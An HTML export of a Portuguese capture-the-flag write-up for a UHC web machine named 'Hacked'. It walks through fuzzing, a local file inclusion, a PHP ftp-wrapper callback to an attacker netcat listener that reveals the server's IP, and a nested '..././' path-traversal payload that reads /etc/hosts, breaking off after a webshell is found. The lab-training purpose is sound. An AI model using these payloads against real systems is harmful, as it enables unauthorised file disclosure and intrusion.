<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>UHCV33 - (Classificatória - Web) Official Write-Up - Hacked</title><style>
/* webkit printing magic: print all background colors */
html {
	-webkit-print-color-adjust: exact;
}
* {
	box-sizing: border-box;
	-webkit-print-color-adjust: exact;
}

html,
body {
	margin: 0;
	padding: 0;
}
@media only screen {
	body {
		margin: 2em auto;
		max-width: 900px;
		color: rgb(55, 53, 47);
	}
}

body {
	line-height: 1.5;
	white-space: pre-wrap;
}

a,
a.visited {
	color: inherit;
	text-decoration: underline;
}

.pdf-relative-link-path {
	font-size: 80%;
	color: #444;
}

h1,
h2,
h3 {
	letter-spacing: -0.01em;
	line-height: 1.2;
	font-weight: 600;
	margin-bottom: 0;
}

.page-title {
	font-size: 2.5rem;
	font-weight: 700;
	margin-top: 0;
	margin-bottom: 0.75em;
}

h1 {
	font-size: 1.875rem;
	margin-top: 1.875rem;
}

h2 {
	font-size: 1.5rem;
	margin-top: 1.5rem;
}

h3 {
	font-size: 1.25rem;
	margin-top: 1.25rem;
}

.source {
	border: 1px solid #ddd;
	border-radius: 3px;
	padding: 1.5em;
	word-break: break-all;
}

.callout {
	border-radius: 3px;
	padding: 1rem;
}

figure {
	margin: 1.25em 0;
	page-break-inside: avoid;
}

figcaption {
	opacity: 0.5;
	font-size: 85%;
	margin-top: 0.5em;
}

mark {
	background-color: transparent;
}

.indented {
	padding-left: 1.5em;
}

hr {
	background: transparent;
	display: block;
	width: 100%;
	height: 1px;
	visibility: visible;
	border: none;
	border-bottom: 1px solid rgba(55, 53, 47, 0.09);
}

img {
	max-width: 100%;
}

@media only print {
	img {
		max-height: 100vh;
		object-fit: contain;
	}
}

@page {
	margin: 1in;
}

.collection-content {
	font-size: 0.875rem;
}

.column-list {
	display: flex;
	justify-content: space-between;
}

.column {
	padding: 0 1em;
}

.column:first-child {
	padding-left: 0;
}

.column:last-child {
	padding-right: 0;
}

.table_of_contents-item {
	display: block;
	font-size: 0.875rem;
	line-height: 1.3;
	padding: 0.125rem;
}

.table_of_contents-indent-1 {
	margin-left: 1.5rem;
}

.table_of_contents-indent-2 {
	margin-left: 3rem;
}

.table_of_contents-indent-3 {
	margin-left: 4.5rem;
}

.table_of_contents-link {
	text-decoration: none;
	opacity: 0.7;
	border-bottom: 1px solid rgba(55, 53, 47, 0.18);
}

table,
th,
td {
	border: 1px solid rgba(55, 53, 47, 0.09);
	border-collapse: collapse;
}

table {
	border-left: none;
	border-right: none;
}

th,
td {
	font-weight: normal;
	padding: 0.25em 0.5em;
	line-height: 1.5;
	min-height: 1.5em;
	text-align: left;
}

th {
	color: rgba(55, 53, 47, 0.6);
}

ol,
ul {
	margin: 0;
	margin-block-start: 0.6em;
	margin-block-end: 0.6em;
}

li > ol:first-child,
li > ul:first-child {
	margin-block-start: 0.6em;
}

ul > li {
	list-style: disc;
}

ul.to-do-list {
	text-indent: -1.7em;
}

ul.to-do-list > li {
	list-style: none;
}

.to-do-children-checked {
	text-decoration: line-through;
	opacity: 0.375;
}

ul.toggle > li {
	list-style: none;
}

ul {
	padding-inline-start: 1.7em;
}

ul > li {
	padding-left: 0.1em;
}

ol {
	padding-inline-start: 1.6em;
}

ol > li {
	padding-left: 0.2em;
}

.mono ol {
	padding-inline-start: 2em;
}

.mono ol > li {
	text-indent: -0.4em;
}

.toggle {
	padding-inline-start: 0em;
	list-style-type: none;
}

/* Indent toggle children */
.toggle > li > details {
	padding-left: 1.7em;
}

.toggle > li > details > summary {
	margin-left: -1.1em;
}

.selected-value {
	display: inline-block;
	padding: 0 0.5em;
	background: rgba(206, 205, 202, 0.5);
	border-radius: 3px;
	margin-right: 0.5em;
	margin-top: 0.3em;
	margin-bottom: 0.3em;
	white-space: nowrap;
}

.collection-title {
	display: inline-block;
	margin-right: 1em;
}

time {
	opacity: 0.5;
}

.icon {
	display: inline-block;
	max-width: 1.2em;
	max-height: 1.2em;
	text-decoration: none;
	vertical-align: text-bottom;
	margin-right: 0.5em;
}

img.icon {
	border-radius: 3px;
}

.user-icon {
	width: 1.5em;
	height: 1.5em;
	border-radius: 100%;
	margin-right: 0.5rem;
}

.user-icon-inner {
	font-size: 0.8em;
}

.text-icon {
	border: 1px solid #000;
	text-align: center;
}

.page-cover-image {
	display: block;
	object-fit: cover;
	width: 100%;
	height: 30vh;
}

.page-header-icon {
	font-size: 3rem;
	margin-bottom: 1rem;
}

.page-header-icon-with-cover {
	margin-top: -0.72em;
	margin-left: 0.07em;
}

.page-header-icon img {
	border-radius: 3px;
}

.link-to-page {
	margin: 1em 0;
	padding: 0;
	border: none;
	font-weight: 500;
}

p > .user {
	opacity: 0.5;
}

td > .user,
td > time {
	white-space: nowrap;
}

input[type="checkbox"] {
	transform: scale(1.5);
	margin-right: 0.6em;
	vertical-align: middle;
}

p {
	margin-top: 0.5em;
	margin-bottom: 0.5em;
}

.image {
	border: none;
	margin: 1.5em 0;
	padding: 0;
	border-radius: 0;
	text-align: center;
}

.code,
code {
	background: rgba(135, 131, 120, 0.15);
	border-radius: 3px;
	padding: 0.2em 0.4em;
	border-radius: 3px;
	font-size: 85%;
	tab-size: 2;
}

code {
	color: #eb5757;
}

.code {
	padding: 1.5em 1em;
}

.code-wrap {
	white-space: pre-wrap;
	word-break: break-all;
}

.code > code {
	background: none;
	padding: 0;
	font-size: 100%;
	color: inherit;
}

blockquote {
	font-size: 1.25em;
	margin: 1em 0;
	padding-left: 1em;
	border-left: 3px solid rgb(55, 53, 47);
}

.bookmark {
	text-decoration: none;
	max-height: 8em;
	padding: 0;
	display: flex;
	width: 100%;
	align-items: stretch;
}

.bookmark-title {
	font-size: 0.85em;
	overflow: hidden;
	text-overflow: ellipsis;
	height: 1.75em;
	white-space: nowrap;
}

.bookmark-text {
	display: flex;
	flex-direction: column;
}

.bookmark-info {
	flex: 4 1 180px;
	padding: 12px 14px 14px;
	display: flex;
	flex-direction: column;
	justify-content: space-between;
}

.bookmark-image {
	width: 33%;
	flex: 1 1 180px;
	display: block;
	position: relative;
	object-fit: cover;
	border-radius: 1px;
}

.bookmark-description {
	color: rgba(55, 53, 47, 0.6);
	font-size: 0.75em;
	overflow: hidden;
	max-height: 4.5em;
	word-break: break-word;
}

.bookmark-href {
	font-size: 0.75em;
	margin-top: 0.25em;
}

.sans { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol"; }
.code { font-family: "SFMono-Regular", Consolas, "Liberation Mono", Menlo, Courier, monospace; }
.serif { font-family: Lyon-Text, Georgia, YuMincho, "Yu Mincho", "Hiragino Mincho ProN", "Hiragino Mincho Pro", "Songti TC", "Songti SC", "SimSun", "Nanum Myeongjo", NanumMyeongjo, Batang, serif; }
.mono { font-family: iawriter-mono, Nitti, Menlo, Courier, monospace; }
.pdf .sans { font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .code { font-family: Source Code Pro, "SFMono-Regular", Consolas, "Liberation Mono", Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.pdf .serif { font-family: PT Serif, Lyon-Text, Georgia, YuMincho, "Yu Mincho", "Hiragino Mincho ProN", "Hiragino Mincho Pro", "Songti TC", "Songti SC", "SimSun", "Nanum Myeongjo", NanumMyeongjo, Batang, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.highlight-default {
}
.highlight-gray {
	color: rgb(155,154,151);
}
.highlight-brown {
	color: rgb(100,71,58);
}
.highlight-orange {
	color: rgb(217,115,13);
}
.highlight-yellow {
	color: rgb(223,171,1);
}
.highlight-teal {
	color: rgb(15,123,108);
}
.highlight-blue {
	color: rgb(11,110,153);
}
.highlight-purple {
	color: rgb(105,64,165);
}
.highlight-pink {
	color: rgb(173,26,114);
}
.highlight-red {
	color: rgb(224,62,62);
}
.highlight-gray_background {
	background: rgb(235,236,237);
}
.highlight-brown_background {
	background: rgb(233,229,227);
}
.highlight-orange_background {
	background: rgb(250,235,221);
}
.highlight-yellow_background {
	background: rgb(251,243,219);
}
.highlight-teal_background {
	background: rgb(221,237,234);
}
.highlight-blue_background {
	background: rgb(221,235,241);
}
.highlight-purple_background {
	background: rgb(234,228,242);
}
.highlight-pink_background {
	background: rgb(244,223,235);
}
.highlight-red_background {
	background: rgb(251,228,228);
}
.block-color-default {
	color: inherit;
	fill: inherit;
}
.block-color-gray {
	color: rgba(55, 53, 47, 0.6);
	fill: rgba(55, 53, 47, 0.6);
}
.block-color-brown {
	color: rgb(100,71,58);
	fill: rgb(100,71,58);
}
.block-color-orange {
	color: rgb(217,115,13);
	fill: rgb(217,115,13);
}
.block-color-yellow {
	color: rgb(223,171,1);
	fill: rgb(223,171,1);
}
.block-color-teal {
	color: rgb(15,123,108);
	fill: rgb(15,123,108);
}
.block-color-blue {
	color: rgb(11,110,153);
	fill: rgb(11,110,153);
}
.block-color-purple {
	color: rgb(105,64,165);
	fill: rgb(105,64,165);
}
.block-color-pink {
	color: rgb(173,26,114);
	fill: rgb(173,26,114);
}
.block-color-red {
	color: rgb(224,62,62);
	fill: rgb(224,62,62);
}
.block-color-gray_background {
	background: rgb(235,236,237);
}
.block-color-brown_background {
	background: rgb(233,229,227);
}
.block-color-orange_background {
	background: rgb(250,235,221);
}
.block-color-yellow_background {
	background: rgb(251,243,219);
}
.block-color-teal_background {
	background: rgb(221,237,234);
}
.block-color-blue_background {
	background: rgb(221,235,241);
}
.block-color-purple_background {
	background: rgb(234,228,242);
}
.block-color-pink_background {
	background: rgb(244,223,235);
}
.block-color-red_background {
	background: rgb(251,228,228);
}
.select-value-color-default { background-color: rgba(206,205,202,0.5); }
.select-value-color-gray { background-color: rgba(155,154,151, 0.4); }
.select-value-color-brown { background-color: rgba(140,46,0,0.2); }
.select-value-color-orange { background-color: rgba(245,93,0,0.2); }
.select-value-color-yellow { background-color: rgba(233,168,0,0.2); }
.select-value-color-green { background-color: rgba(0,135,107,0.2); }
.select-value-color-blue { background-color: rgba(0,120,223,0.2); }
.select-value-color-purple { background-color: rgba(103,36,222,0.2); }
.select-value-color-pink { background-color: rgba(221,0,129,0.2); }
.select-value-color-red { background-color: rgba(255,0,26,0.2); }

.checkbox {
	display: inline-flex;
	vertical-align: text-bottom;
	width: 16;
	height: 16;
	background-size: 16px;
	margin-left: 2px;
	margin-right: 5px;
}

.checkbox-on {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20width%3D%2216%22%20height%3D%2216%22%20fill%3D%22%2358A9D7%22%2F%3E%0A%3Cpath%20d%3D%22M6.71429%2012.2852L14%204.9995L12.7143%203.71436L6.71429%209.71378L3.28571%206.2831L2%207.57092L6.71429%2012.2852Z%22%20fill%3D%22white%22%2F%3E%0A%3C%2Fsvg%3E");
}

.checkbox-off {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20x%3D%220.75%22%20y%3D%220.75%22%20width%3D%2214.5%22%20height%3D%2214.5%22%20fill%3D%22white%22%20stroke%3D%22%2336352F%22%20stroke-width%3D%221.5%22%2F%3E%0A%3C%2Fsvg%3E");
}
	
</style></head><body><article id="873289be-05e8-4bb2-a6c9-44b89409faa7" class="page sans"><header><img class="page-cover-image" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/background1.png" style="object-position:center 0%"/><div class="page-header-icon page-header-icon-with-cover"><img class="icon" src="http://pngimg.com/uploads/anonymous_mask/anonymous_mask_PNG32.png"/></div><h1 class="page-title">UHCV33 - (Classificatória - Web) Official Write-Up - Hacked</h1><table class="properties"><tbody><tr class="property-row property-row-multi_select"><th><span class="icon property-icon"><svg viewBox="0 0 14 14" style="width:14px;height:14px;display:block;fill:rgba(55, 53, 47, 0.4);flex-shrink:0;-webkit-backface-visibility:hidden" class="typesMultipleSelect"><path d="M4,3 C4,2.447715 4.447715,2 5,2 L12,2 C12.5523,2 13,2.447716 13,3 C13,3.55228 12.5523,4 12,4 L5,4 C4.447715,4 4,3.55228 4,3 Z M4,7 C4,6.447715 4.447715,6 5,6 L12,6 C12.5523,6 13,6.447716 13,7 C13,7.55228 12.5523,8 12,8 L5,8 C4.447715,8 4,7.55228 4,7 Z M4,11 C4,10.447715 4.447715,10 5,10 L12,10 C12.5523,10 13,10.447716 13,11 C13,11.55228 12.5523,12 12,12 L5,12 C4.447715,12 4,11.55228 4,11 Z M2,4 C1.44771525,4 1,3.55228475 1,3 C1,2.44771525 1.44771525,2 2,2 C2.55228475,2 3,2.44771525 3,3 C3,3.55228475 2.55228475,4 2,4 Z M2,8 C1.44771525,8 1,7.55228475 1,7 C1,6.44771525 1.44771525,6 2,6 C2.55228475,6 3,6.44771525 3,7 C3,7.55228475 2.55228475,8 2,8 Z M2,12 C1.44771525,12 1,11.5522847 1,11 C1,10.4477153 1.44771525,10 2,10 C2.55228475,10 3,10.4477153 3,11 C3,11.5522847 2.55228475,12 2,12 Z"></path></svg></span>vulns and exploitations</th><td><span class="selected-value select-value-color-green">LFI</span><span class="selected-value select-value-color-gray">cowsay</span><span class="selected-value select-value-color-blue">docker</span><span class="selected-value select-value-color-orange">docker escape</span><span class="selected-value select-value-color-default">gtfob</span><span class="selected-value select-value-color-purple">local file inclusion</span><span class="selected-value select-value-color-purple">privileged container</span><span class="selected-value select-value-color-default">sudo</span><span class="selected-value select-value-color-default">type juggling</span></td></tr></tbody></table></header><div class="page-body"><h3 id="da6abe61-0a42-46e1-83ca-85f72e8fd8d3" class="">Escrito por: Vinicius (big0us)<mark class="highlight-yellow"> </mark><mark class="highlight-teal"> </mark></h3><p id="1871565c-b0ab-45e1-92af-81a822eadd51" class="">Tenho 16 anos, jogo CTF faz alguns meses e também participo do UHC aos finais de semanas. Essa máquina foi feita por mim com ajuda dos meus amigos Luska e Kadu para o UHC. Os arquivos dela e o Dockerfile estarão no meu GitHub.</p><ul id="4bfedd43-aec7-441e-a0c9-881e79f688ac" class="toggle"><li><details open=""><summary>Perfis</summary><figure id="69d1919b-729d-45a9-af5f-7fcb19744f55"><a href="https://github.com/viniciuspereiras/" class="bookmark source"><div class="bookmark-info"><div class="bookmark-text"><div class="bookmark-title">viniciuspereiras - Overview</div><div class="bookmark-description">as vezes &quot;big0us&quot; for fun :). viniciuspereiras has one repository available. Follow their code on GitHub.</div></div><div class="bookmark-href"><img src="https://github.com/favicon.ico" class="icon bookmark-icon"/>https://github.com/viniciuspereiras/</div></div><img src="https://avatars2.githubusercontent.com/u/69733777?s=400&amp;u=0132e5e4a44d7bd0eb01176e2187618a1f7aa887&amp;v=4" class="bookmark-image"/></a></figure><figure id="37373d9e-b8ff-4cb6-b0b9-752fcba140cf"><a href="https://tryhackme.com/p/big0us" class="bookmark source"><div class="bookmark-info"><div class="bookmark-text"><div class="bookmark-title">TryHackMe | big0us</div><div class="bookmark-description">TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!</div></div><div class="bookmark-href"><img src="https://assets.tryhackme.com/img/favicon.png" class="icon bookmark-icon"/>https://tryhackme.com/p/big0us</div></div><img src="https://tryhackme-images.s3.amazonaws.com/user-avatars/acbda194c8e42a3049fb6ffcbf6dc290.png" class="bookmark-image"/></a></figure><figure id="a6566fcf-5d09-49cc-9c2a-d8f922630a0b"><a href="https://www.hackthebox.eu/home/users/profile/406363" class="bookmark source"><div class="bookmark-info"><div class="bookmark-text"><div class="bookmark-title">Hack The Box :: Penetration Testing Labs</div><div class="bookmark-description">Login to the Hack The Box platform and take your pen-testing and cyber security skills to the next level!</div></div><div class="bookmark-href"><img src="https://www.hackthebox.eu/images/favicon.png" class="icon bookmark-icon"/>https://www.hackthebox.eu/home/users/profile/406363</div></div><img src="https://www.hackthebox.eu/images/favicon.png" class="bookmark-image"/></a></figure></details></li></ul><h1 id="0f68a69a-a10b-43a0-98d9-0d6d8c55e82f" class="">Recon</h1><p id="43d3c65f-8106-49e5-80a3-a2930cb26c46" class="">A primeira página é uma linda arte (uma deface), dizendo que o site foi hackeado:</p><figure id="47058ea7-a107-45c2-bc76-ea38146d1363" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled.png"><img style="width:624px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled.png"/></a></figure><p id="5a855fb0-477c-47dc-aeb2-57ae6de5d1b8" class="">Logo de cara temos uma flag, essa eu não censurei pois é literalmente abrir o site. Lendo o source code da página não encontrei nada, como esse arquivo deve ser o index vamos rodar um fuzzing no site para achar mais arquivos e diretórios. Utilizei o ffuf com as wordlists do <a href="https://github.com/danielmiessler/SecLists">seclists</a>.</p><p id="498d1445-103c-439e-becb-dadc1836d0b1" class="block-color-yellow">common.txt:</p><figure id="c75b8ebf-ded5-4031-928b-63f62a663421" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%201.png"><img style="width:672px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%201.png"/></a></figure><p id="08832669-628c-40d4-aa78-4e26e4ca59a2" class="">De costume vou testar esse /uploads/, mas deu 404 😢</p><p id="6ec07cd4-97fe-4346-badc-9e83cfa3f47b" class=""><mark class="highlight-yellow">raft-small-files.txt:</mark></p><figure id="28538144-747b-43b6-935b-54dd0f44d2de" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%202.png"><img style="width:624px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%202.png"/></a></figure><p id="e385137a-a32c-4c73-bdd2-e7b4a49ffde3" class="">Parece que encontramos um também &quot;home.php&quot; vamos dar uma olhada:</p><figure id="93af2b13-c802-44be-8294-9518e9e2c1f7" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%203.png"><img style="width:1366px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%203.png"/></a></figure><p id="0399dcf0-cbcf-4c84-a23f-175a6f11ab4c" class="">Um site sobre customização de carros, vamos dar uma navegada no site para ver se encontramos algo interessante:</p><p id="a52a6041-bcb7-4269-bf39-eb1eb33dd7b7" class="">Logo percebemos que quando clicamos nos botões ali no cabeçalho não somos redirecionados para a página deles, e sim a página deles é &quot;incluída&quot;  em um parâmetro GET no home.php:</p><figure id="b3684eff-1d98-437d-b024-89bb663798a8" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%204.png"><img style="width:337px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%204.png"/></a></figure><p id="f531db9c-3e0e-46f8-9ef7-fae57c2e9879" class="">Isso parece estar vulnerável a Local File Inclusion (LFI), uma vulnerabilidade que permite ao atacante incluir ou ler arquivos do servidor...</p><p id="b41f0f1d-4133-499c-b3c1-cd884e6e15a5" class="">(Agora vai ter uma divisão no write-up para você que fez a máquina no dia do uhc ou no UHCLABS ou se você estiver rodando no docker. Se você estiver no docker ou localmente sem nenhum WAF é só pular a próxima parte &quot;WAF bypass&quot;)</p><h1 id="3e0ada08-fd98-4b31-ab04-72ff98ce1f9f" class="">Exploitation - LFI</h1><ul id="4c8a4e1c-6377-4d26-a14a-881a190d84b9" class="toggle"><li><details open=""><summary><mark class="highlight-red">WAF bypass</mark></summary><p id="c8b07d57-3698-4b4e-9cb2-4885755a9a4b" class="">No UHC havia um WAF do cloudfare, e isso impossibilitou ler arquivos do servidor completamente, então vamos seguir com a exploração do nosso LFI, vamos fazer um teste tentando incluir o nosso home.php alterando a URL para: (apenas home pois nas outras páginas ele auto completa o .php):</p><pre id="e3a12526-cde7-4a19-a653-4a0b6b1b37eb" class="code"><code>https://hacked.uhclabs.com/home.php?page=home</code></pre><figure id="5dff95aa-ae5f-4980-9547-fc541d49c859" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%205.png"><img style="width:1345px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%205.png"/></a></figure><p id="aa0a3c92-4edb-4db0-8370-9da1741888a6" class="">
</p><figure id="d61387a5-00b2-4460-bb73-39c13cee8a3b" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%206.png"><img style="width:432px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%206.png"/></a></figure><p id="4e914d3b-8da0-4c63-85df-8b3246eb5317" class="">A página ficou duplicada, e no source podemos comprovar isso, porém, se a página é um php que inclui outras páginas, onde está as tags php e o código php para nós vermos como isso funciona? </p><p id="7a7afd73-57c4-42e6-9dd6-5775cc56cb17" class="">Ai é que está o WAF (Web Application Firewall) está omitindo o código php do nosso arquivo. Então teremos de fazer um Bypass do WAF e acessar diretamente o ip do servidor, e para isso vamos aproveitar nosso LFI.</p><h3 id="04f45c76-c310-438a-b152-15e473c8c103" class=""> Exploitation Bypass WAF</h3><p id="2b8ed1c9-2ef9-44fa-867a-017a8231318d" class="">Para explorar esse bypass utilizaremos os wrappers do php. (<a href="https://www.php.net/manual/en/wrappers.php">https://www.php.net/manual/en/wrappers.php</a>)</p><figure id="d5f139cc-96c8-472c-8e2c-88ce0c9066ef" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%207.png"><img style="width:415px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%207.png"/></a></figure><p id="ff6c487c-a956-4313-939b-837b4c1a4212" class="">Vamos usar o wrapper do ftp para fazer o site fazer uma requisição para o nosso IP como se fosse se conectar ao ftp assim nos indicando qual é o IP real do servidor.</p><p id="d1c9263f-742b-4e3c-a097-f96be03739ee" class="">Na minha máquina:</p><pre id="b6bcd08f-7ca2-454f-b4c8-ecec4619965c" class="code"><code>nc -lvp 4444</code></pre><p id="fa585c41-9d96-4a2c-a460-6bae6369e0d3" class="">Payload:</p><pre id="11995402-26c4-4eb1-9b34-5cd364ee6d58" class="code"><code>https://hacked.uhclabs.com/home.php?page=ftp://IP:PORT/x</code></pre><p id="cab91d84-5437-4751-af6e-831f440d5ebd" class="">Recebemos:</p><figure id="c3f8f4eb-d7cc-4636-bc22-a60f0345fdce" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%208.png"><img style="width:726px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%208.png"/></a></figure><p id="842515e9-671d-4d0b-b654-ccb17a9fef87" class="">Esses servidores ec2 da amazom para pegar o ip é só pegar esses números da url: 34.219.224.183</p><p id="63c5155a-74b6-4561-81eb-f36c66d18a18" class="">Vamos acessar e rodar a inclusão do home.php e deve funcionar.</p><p id="273ba777-38a5-47e2-9407-7a5b28492083" class="">
</p></details></li></ul><figure id="01fc5f57-50cc-42eb-9940-2ecd1eb41266" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%209.png"><img style="width:673px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%209.png"/></a></figure><p id="26623c06-fa8b-4663-8313-083eb737d1ce" class="">Apenas trocando a URL por home ele automaticamente adicionou o .php e nos mostrou o conteúdo do arquivo home.php.</p><p id="ef642d11-9237-4cdd-b8fc-03f7478dc07c" class="">Lendo esse código podemos perceber que ele tem algumas proteções quanto a algumas coisas. Vamos tentar ler arquivos do servidor no caso o clássico /etc/passwd:</p><p id="241676fd-cdbd-4793-b61e-61e708e87f53" class=""> (../ serve para voltar diretórios)</p><figure id="cc297e7d-444e-4766-81b0-41fbafe7cc49" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2010.png"><img style="width:549px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2010.png"/></a></figure><figure id="2d16d00d-3625-499e-8677-256d23d2ac7b" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2011.png"><img style="width:221px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2011.png"/></a></figure><p id="9644f405-5825-4b6b-b7ec-e498bb5f86f5" class="">Pelo o que podemos ver retornou um erro, que podemos entender já que temos o código. Da nossa payload ele retirou todos os &quot;../&quot; e substituiu por &quot;&quot; (nada) , ele retirou a palavra &quot;passwd&quot; e trocou por &quot;ERROR&quot; e por fim adicionou &quot;.php&quot; no final, logo o arquivo não existe e ele não mostra o conteúdo.</p><p id="0b5bef50-42f3-4037-9671-a5aa1f491046" class="">Lendo o código podemos ver que a proteção de &quot;../&quot; está vulnerável a um bypass que consiste em escrever uma palavra dentro da outra:</p><pre id="1bb18710-419f-494e-94e3-7c94c7443215" class="code"><code>pal(palavra)avra -&gt; palpalavraavra
.(../)./ -&gt; ..././</code></pre><p id="dc1cb983-98dd-4ebd-a74e-99c4228617c2" class="">Assim quando o código retirar a primeira palavra ele vai concatenar a palavra proibida passando o que queremos.</p><p id="80813263-ed9c-4279-a474-dfb6b188bef9" class="">Para bypassarmos o ERROR não vamos conseguir, portando vamos ler outro arquivo que não esteja na nossa blackllist como /etc/hosts.</p><p id="681f8a80-7a7c-46d7-9f82-6a2112265685" class="">Agora o .php no final, tem uma linha no código que diz que se existir um parâmetro GET chamado &quot;ext&quot; ele vai usar o que estiver nele para completar a extensão do arquivo, e se o parâmetro não estiver setado ele vai adicionar .php no final. Logo o que temos que fazer é setar o parâmetro ext para &quot;&quot;(nada).</p><p id="9c0969ea-e1b1-4e96-8d03-4907611adead" class="">Vamos a payload:</p><pre id="e3214032-0ee2-4505-836e-6ec6b09a4a52" class="code"><code>34.219.224.183/home.php?page=..././..././..././..././..././etc/hosts&amp;ext=</code></pre><p id="2b540e79-dc46-4f63-a3cd-da0f9ea22c82" class="">Conseguimos!</p><figure id="c43edc19-61aa-4124-882b-ce4a585c403d" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2012.png"><img style="width:321px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2012.png"/></a></figure><p id="711ebc8e-2bee-4f30-9cd4-0748d4d36e0c" class="">Bom agora parece que teremos que ler algum arquivo do servidor, poderíamos fazer um fuzzing usando o LFI ou refazer nosso fuzzing novamente e usar o LFI para ler os arquivos. Rodei a wordlist raft-large-words.txt com a extensão php. (Usei um filtro de tamanho do ffuf &quot;-fs 283&quot;)</p><pre id="890bd992-7d18-4c96-ad47-b4920c0c9fc5" class="code"><code>ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -u &#x27;https://hacked.uhclabs.com/uploads/FUZZ&#x27; -e .php </code></pre><figure id="d2f6b63a-c2d1-442a-abe2-ee662a55a250" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2013.png"><img style="width:844px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2013.png"/></a></figure><p id="5fa609c5-2c9c-422a-9d6b-c5bcff9654e3" class="">Parece que encontramos a webshell que o hacker usou para invadir esse sistema, vamos dar uma olhada nela e ao mesmo tempo usar o nosso LFI para ler 